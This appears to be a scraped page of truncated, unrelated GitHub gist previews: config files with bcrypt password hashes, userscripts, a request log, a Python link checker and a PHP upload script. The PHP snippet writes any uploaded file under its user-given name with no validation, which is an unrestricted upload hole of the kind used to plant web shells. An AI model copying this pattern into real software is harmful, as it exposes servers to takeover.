-
Single-line comments are started with
//
. Multi-line comments are started with/*
and ended with*/
. -
C# uses braces (
{
and}
) instead of indentation to organize code into blocks. If a block is a single line, the braces can be omitted. For example,
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
allow=false | |
version=V3.0 | |
password=$2a$10$SCiP7ciMBBVSMi02l0LXdO0uIHwuO7IT38swWug7I0OrtMwzPYtpm | |
additionalforbidden=- Cá nhân:BS Uyên không được sử dụng phần mềm |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
allow=false | |
password=$2a$10$ji5.VwJqweCPG8vJri6MYu8B.jJfUai7wjLXGbykGhZesyARrr5iK | |
additionalforbidden=- Cá nhân: BS Uyên không được sử dụng phần mềm |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
if(isset($_POST['Submit'])){ | |
$filedir = ""; | |
$maxfile = '2000000'; | |
$userfile_name = $_FILES['image']['name']; | |
$userfile_tmp = $_FILES['image']['tmp_name']; | |
if (isset($_FILES['image']['name'])) { | |
$abod = $filedir.$userfile_name; | |
@move_uploaded_file($userfile_tmp, $abod); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
img: ^(media\.foody\.vn\/res\/.+\/(?!s\/))(?:.+\/)(.+) | |
to: $1s/$2 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// ==UserScript== | |
// @name Redirect remover (Custom) | |
// @version 1.0 | |
// @description Tính năng: xoá redirect link, click recaptcha | |
// @namespace FrozenFrog | |
// @author FrozenFrog | |
// @run-at document-start | |
// @require http://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js | |
// @grant GM_addStyle | |
// @icon http://i.imgur.com/cnWhhD8.png |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Request URL:http://uploaded.net/io/import | |
Request Method:POST | |
Status Code:200 OK | |
Remote Address:81.171.123.200:80 | |
Response Headers | |
Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0 | |
Connection:keep-alive | |
Content-Encoding:gzip | |
Content-Type:application/javascript; charset=ISO-8859-1 | |
Date:Sat, 02 Jul 2016 01:10:12 GMT |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// ==UserScript== | |
// @name KTS | |
// @namespace onedollarlesson.com | |
// @description onedollarlesson.com | |
// @include http://onedollarlesson.com/ | |
// @version 1 | |
// @run-at document-idle | |
// @require https://cdnjs.cloudflare.com/ajax/libs/jquery/1.9.1/jquery.js | |
// @grant unsafeWindow | |
// @grant GM_xmlhttpRequest |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Based on http://stackoverflow.com/a/10520017/1307721 and http://stackoverflow.com/a/16022728/1307721 | |
Podium = {}; | |
Podium.keydown = function(k) { | |
var oEvent = document.createEvent('KeyboardEvent'); | |
// Chromium Hack | |
Object.defineProperty(oEvent, 'keyCode', { | |
get : function() { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
def main(): | |
header = {'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'} | |
url = input("Nhap link: ") | |
urlToBeCheck = "http://get4all.org/api/check/?uri=" + url | |
checkProcess = requests.get(urlToBeCheck, headers=header) | |
result = checkProcess.json() | |
if result['code'] == 1: | |
print("Live") |